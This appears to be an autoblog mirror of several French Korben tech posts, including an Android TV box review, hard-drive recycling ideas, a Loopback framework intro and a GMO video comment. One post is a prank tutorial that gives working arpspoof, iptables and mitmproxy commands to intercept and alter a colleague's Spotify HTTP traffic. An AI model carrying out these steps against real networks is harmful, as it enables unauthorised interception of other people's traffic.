PROJET AUTOBLOG


Korben

source: Korben

⇐ retour index

Mise à jour

Mise à jour de la base de données, veuillez patienter...

Test Android TV VORKE Z1

lundi 10 avril 2017 à 18:19

Android TV est à l'image d'Android lui-même, pas d'exceptions, comme le soft le hardware est partout, il s'adapte à toutes les configurations, tous les matos, toutes les bourses, bref, il y en a pour tout le monde tant la fragmentation est importante.

Dans la catégorie haut de gamme, on trouve bien sûr la NVIDIA Shield TV, la dernière version est juste très belle et très performante mais dans les catégories inférieures on peut aussi trouver son bonheur et pour pas très cher.


Vorke Z1

Vorke se positionne sur deux types de boîtiers multimédia pour le salon, les mini-PC équipés de Windows 10 et les box Android.
Avec son Z1, sous Android, la marque essaie de proposer une box plug'n play, sans bidouille excessive.
La box est équipée d'un CPU S912 64bit pouvant atteindre jusqu'à 1,5GHz, de 3GB de RAM en DDR4 et embarque 32GB de stockage, un slot micro SD, port ethernet et USB et HDMI en connectiques.
Cherry on the gâteau, elle est vendue avec Android 6, direct t'ouvres la boîte, tu plug et t'as la dernière version d'Android fonctionnelle. Quid de la suite, Android 7 ready ou pas, la marque ne communique pas sur les modèles qui seront upgradés. Au moins, on se tape pas une énième box sous android 5...coup de gueule passé.

Côté design, c'est propre, rien à dire, l'objet est solide, pas de craquements chelous sous les doigts quand on le manipule, petit bémol, le câble HDMI fourni est par contre sacrément chiant à retirer, un conseil, une fois plugger, passez pas votre vie à déplacer la box, vous allez péter un câble ;););)
Blague part, c'est costaud et pas vilain une fois placée à côté de la télé.

Niveau connectiques, le super plus et c'est un cri qui vient du cœur, c'est que la box est vendue avec un adaptateur EU. A la base, la prise secteur est US-Chine, mais dans la boîte vous avez un petit adaptateur pour brancher l'appareil sur une bonne vieille prise secteur FRA, au top. C'est à souligner, car ça reste rare, d'habitude, quand vous achetez un matos sur un site Sino-américain, vous avez intérêt à avoir un adaptateur EU sinon au moment de brancher votre joujou vous êtes …


Un mot sur la télécommande, tout comme la box, c'est solide, les boutons de contrôle ne partent pas dans tous les sens quand on appuie dessus, ça tient bien, je dirais même, ça clique bien. Sinon, comme d'hab, y a des boutons qui servent à que dalle comme le set « TV control » qui fonctionne quand il veut et le pavé numérique, lui aussi capricieux dans son fonctionnement.
En fait, ça me donne l'impression que ce genre de télécommande, au design hérité des télécommandes de TV classiques, n'est pas du tout adapté pour les box TV (Android, iOS etc...)
Pour tout vous dire, moi j'ai eu plus de faciliter (et de plaisir) à la contrôler avec une souris bluetooth. Alors ok, ça monopolise un port USB mais franchement, avec un autre USB de libre, un slot micro SD et 32 Go embarqués ...osef.

Côté interface, ça brille, y a de la couleur. Mais rien de surprenant et c'est dommage en quelque sorte. J'ai déjà pu tester certaines box chinoises comme la mini 8 et déjà c'était la même interface proposée...il y a 1 an.
Rien d'original donc, sauf quand même la possibilité, dès le démarrage de choisir deux interfaces... WTF Korben tu viens de dire qu'il y avait rien d'original...et bien c'est que les deux interfaces ont la même tronche et c'est pas une blague, c'est les deux mêmes. Le point particulier à souligner, c'est juste que contrairement à d'autres box de la catégorie, le launcher ici n'est pas bridé. Sans bidouiller, on peut installer n'importe quel launcher disponibles sur le Play Store. Le play store officiel de Google est en effet installé (et à jour) sur le Vorke Z1. A partir de là, on peut bien s'amuser avec.

J'en profite pour vous dire que la plupart des services classiques sont également installés par défaut, Netflix, Amazon Video et même Kodi, du coup, ceux qui ont un compte, n'ont plus qu'à le rentrer et en voiture Simone, on a tout son univers multimédia en marche.

Niveau performances ça fait le job, les amateurs de stream auront une HD parfaite, Youtube au max passe nickel et ceux qui y feront défiler leurs photos de vacances ne sembleront pas moins bronzé, mais j'ai quand même une interrogation sur le S912.
Il chauffe très vite, alors il est indiqué que la box est compatible 4K (je n'ai pas pu tester cette feature) mais quand on lance un gros fichier vidéo HD, faut pas attendre longtemps avant d'avoir une notification nous alertant que le CPU chauffe un peu trop et qu'il vaudrait mieux lancer
l'utilitaire fourni pour couper les applications qui tourneraient en même temps que le lecteur vidéo, histoire de faire souffler la bête.

Performances ok donc mais quid de sa capacité à supporter sur le long terme, les enchaînements réguliers de lectures vidéos trop gourmandes, tel un multi-kick de Chun-Li. Surtout si on oublie de fermer les applications en tâche de fond, mais ça, ça se règle facilement.


Ma conclusion

Chouette petit matos, c'est joli et efficace, dans le sens que ça fait bien ce pourquoi c'est fabriqué. Est-ce que ça remplace mon install Rpi, b'hein c'est toujours la même rengaine Hélène, ça dépend si vous voulez un truc aux petits oignons en y passant un peu de temps ou si vous voulez un truc tout prêt, directement fonctionnel sans prise de tête. Le principe même d'une box TV.
Et sur ce plan le Vorke Z1 y répond bien. Mais, pour moi, malgré un prix affiché de 131,83 € (hors promo) et des specs sur papier qui peuvent la placer dans la catégorie haut de gamme des box, ce n'en est pas une. Le boîtier est costaud, de qualité mais le proc chauffe vite et ça manque de soin apporté à l'interface. Enfin, rien à redire sur la prestation, le coup de l'adaptateur EU livré m'a personnellement bluffé. La prise HDMI fournie avec la box j'en avais l'habitude, l'adaptateur pas du tout.

Cet article merveilleux et sans aucun égal intitulé : Test Android TV VORKE Z1 ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Que faire avec un disque dur cassé ?

lundi 10 avril 2017 à 08:54

Si vous avez des disques durs totalement HS et que vous ne savez pas quoi en faire à part les réduire en miettes avant de les apporter dans une déchetterie, voici quelques idées de recyclage plutôt pas mal.

Idée n°1

Récupérer les aimants super puissants qui se cachent à l'intérieur pour fabriquer un support à couteau ou une boite à vis magique.

Idée n°2

Un miroir... Bah oui, le petit disque dedans, une fois démonté peut vous servir de miroir, que ce soit pour vous admirer ou pour aveugler les corbeaux.

Idée n°3

Une horloge... Le bricolage n'est pas très compliqué et ça rendra super bien sûr votre bureau.

Idée n°4

En faire une cachette. Videz tout ce qu'il y a dedans, cachez-y de l'argent ou une clé USB scotchée et voilà :-) Vous pouvez même le replacer dans un ordi l'air de rien.

Voilà, à vous de jouer maintenant !

Source

Cet article merveilleux et sans aucun égal intitulé : Que faire avec un disque dur cassé ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Introduction au framework Loopback

vendredi 7 avril 2017 à 13:45

Dans la famille des frameworks Javascript je demande le cousin Loopback.

Framework NodeJS bâti sur Express, la particularité de Loopback est de permettre aux développeurs de coder assez rapidement et efficacement des APIs.

Pierre Clocher développeur chez DATANANAS, a codé au cours d'un RJTalk, une application en live avec ce framework au paradigme singulier, pour démontrer certaines features et possibilités qu'il offre aux développeurs.

Mixins, hooks, observer, ACL, datasources, connector ou même encore tous les modèles que Loopback possède dans sa besace, pour vous aider tout au long de l'écriture de votre code, font que vous allez en devenir accro ;)

D'ailleurs, pour info la promo sur les cours de dev est toujours disponible

Cet article merveilleux et sans aucun égal intitulé : Introduction au framework Loopback ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Rickroller Spotify !

vendredi 7 avril 2017 à 09:00

Saviez-vous que l'application Spotify sous Android streamait les premières secondes d'une chanson en HTTP ? Et alors me direz-vous ?

Et alors si vous êtes sur le même réseau qu'un ami ou un collègue qui utilise Spotify sur son smartphone Android, vous allez pouvoir le rickroller !!

Comment ?

Et bien grâce à une petite attaque de type Man In The Middle, qui va vous permettre de lui streamer la chanson de Rick Ashley au format OGG. Attention, pour que cela fonctionne, vous devez être en IPv4 et que votre "victime" n'ait pas déjà la chanson qu'il écoute dans le cache de Spotify.

Installez dsniff suivi d'un proxy mitm :

apt-get install dsniff

pip install mitmproxy

Puis redirigez le trafic HTTP vers le port 8080 :

sysctl -w net.ipv4.ip_forward=1

iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

Ensuite, identifiez l'IP du téléphone Android, l'IP de la passerelle et lancez un ARP Spoof comme ceci :

arpspoof -t [target ip] [gateway ip]

# Exemple : arpspoof -t 192.168.1.101 192.168.1.1

Chopez ensuite un morceau au format OGG, précisez son nom à la ligne 3 du fichier python rickroll.py que vous pouvez télécharger ici. Et lancez la commande suivante qui mettra en place un proxy transparent sur le port 8080 qui interceptera les requêtes HTTP en direction du domaine heads-akp.spotify.com.edgesuite.net.

Et en avant le rick roll ! Oui c'est clairement se faire chier pour pas grand-chose, mais je sais que vous êtes joueur.

mitmproxy -T -p 8080 -s rickroll.py -i "heads-akp.spotify.com.edgesuite.net"

 

Cet article merveilleux et sans aucun égal intitulé : Rickroller Spotify ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Les OGM sont-ils bons ou mauvais ?

jeudi 6 avril 2017 à 13:11

Si vous ne savez pas quoi penser des OGM, voici une vidéo de Kurzgesagt qui fait un peu le point sur leurs avantages, mais aussi sur les abus que les industriels font de ces OGM comme les fameuses graines Terminator qui donnent des plantes stériles, forçant les agriculteurs à être dépendant du semencier, ou les plants OGM résistants aux pesticides qui par effet collatéral empoisonne notre environnement et les êtres vivants (nous y compris).

Toutefois la conclusion est un peu rapide. Effectivement, les OGM peuvent permettre de nourrir plus de monde en utilisant un même espace. Mais des méthodes de culture plus intelligentes comme la permaculture permettent aussi d'obtenir un rendement intéressant.

Comme toujours, il n'y a pas de réponse toute faite, mais plusieurs réalités qu'il convient de choisir en fonction des situations.

Cet article merveilleux et sans aucun égal intitulé : Les OGM sont-ils bons ou mauvais ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.